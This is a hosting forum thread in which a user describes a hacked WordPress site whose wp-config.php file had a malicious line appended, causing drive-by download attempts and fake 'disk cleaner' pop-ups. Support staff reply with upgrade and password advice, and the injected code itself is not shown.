Hey there,

I emailed you guys about it but I figure others might want to know.

My WP site was hacked a few days ago.

What was happening was that when you'd hit the site with Safari or even Firefox, it would try to download a file called xpl.wmf. It also would give pop-up messages about downloading a "disk cleaner" whenever you hit the admin menu.

I finally tracked down the culprit. My wp-config.php file had been modified. At the very end of the file was the follwing line:



Which, as you can see, is bringing something up. Anyway, I made a copy of the offending file, erased it and re-upped it. Everything (so far as I can see) is now working as it should.

The problem was, however, that my files were not writable. So I have no idea how they got to it or re-wrote it to include that line at the end. It must have happened only two days ago as the file date was modified on 11/19/06, and I only noticed it happening yesterday. I didn't have time to try to track it down until today though.

Any others experienced with this sort of thing? I'd love to know. Also, not sure if this is in the right forum but I figured maybe everyone should know in case there are others out there with the same problem.

What version of Wordpress are you running?

I was on 2.0.4 and upgraded to 2.0.5 while I was tracking this problem.

Version 2.0.5 did have some security related udpates in it. Not sure if that was the reason you were hacked or not but staying current is always a plus.

You should open a ticket with the help desk and ask if they could check the logs.

Also, always use a strong password which you change from time to time.

Nah it's okay. I just wanted you guys to be aware of the situation. I didn't think I'd find it that fast though. But it was simply a matter of finding which file had been recently edited.

BTW, what's up with you guys not being on MSN or on AIM anymore? Did I miss something? I blog very...rarely...so I never really check up on things here unless there's some sort of a problem.

Last time I checked, I was on AOL / MSN nearly 20 hours per day.

Also looking at staff, I see:

tchgurumikej online
tchgurucarl online
tchgurutina online
tchguruandy online

Hmmm...I'll check it out then. Sorry about that. The only time I'd ever use it is if there was a problem though. Again, I don't pay much attention most of the time to my site or anything else. I get a bit busy RL and this is sort of on the back burner for most of the time.